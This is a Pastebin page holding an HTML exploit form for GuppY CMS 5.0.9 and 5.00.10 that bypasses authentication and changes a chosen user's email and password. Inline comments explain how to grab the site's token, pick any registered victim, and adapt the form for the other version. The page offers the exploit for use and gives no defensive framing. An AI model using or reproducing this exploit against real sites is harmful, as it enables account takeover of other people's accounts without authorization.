Advertisement
Dino213dz

cve_cms_guppy.html

Jul 13th, 2019 (edited)
277
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 2.12 KB | None | 0 0
  1. <html>
  2.  <body bgcolor="#000000">
  3.  <font face="arial" color="#01DF01" size="5">
  4.  <center>
  5.  GuppY CMS 5.0.9 & 5.00.10 Authentication bypass/Change email. Other versions may be vulnerable but weren't tested.<br>
  6. Stable with Firefox 34.0.5. Other browsers may be unstable or may not work.<br><br><br>
  7. Thanks: Fred, d1ch4do, & to all of the people who don't believe in me.<br>
  8. <a href="https://linkedin.com/in/brandonm86">My LinkedIn</a><br>-----------------------------------------------------------------------------------</font>
  9.  <body>
  10.    <form action="http://website.com/user.php?lng=en" method="POST"> <!-- Change this action to http://website.com/user.php?lng=en&uuser=new to work with 5.00.10. -->
  11.      <input type="hidden" name="token" value="131095497e5f9d22882.83937400"/> <!-- Click on become a member. View the source then search for "token" and replace this value. Remove this line to work with 5.00.10 -->
  12.      <input type="hidden" name="setusercookie" value="1"/>
  13.      <input type="hidden" name="uuser" value="update"/> <!-- Wet paint. Don't touch! -->
  14.      <input type="hidden" name="code_pseudo" value=""/>
  15.      <input type="text" name="upseudo" value="Vic Username"/><br><br> <!-- User to login as. Can be any registered user with(out) special privileges. -->
  16.      <input type="text" name="uuid" value="Password"/><br><br> <!-- Anything you like as you will change the password to what you want after the exploit succeeds. -->
  17.      <input type="text" name="uuid2" value="Verify Password"/><br><br>
  18.      <input type="text" name="uemail" value="Your Email"/><br><br><br> <!-- Email will be changed to the one you provide. -->
  19.      <input type="hidden" name="uwebsite" value="http://"/>
  20.      <input type="hidden" name="usign" value=""/>
  21.      <input type="hidden" name="uimgsign" value="http://"/>
  22.      <input type="hidden" name="ulang" value="en"/>
  23.      <input type="hidden" name="udesign" value=""/>
  24.      <input type="hidden" name="uboxes" value="LR"/>
  25.      <input type="hidden" name="uextavatar" value="http://"/>
  26.      <input type="submit" value="Enjoy the ride!"/></center>
  27.    </form>
  28.  </body>
  29. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement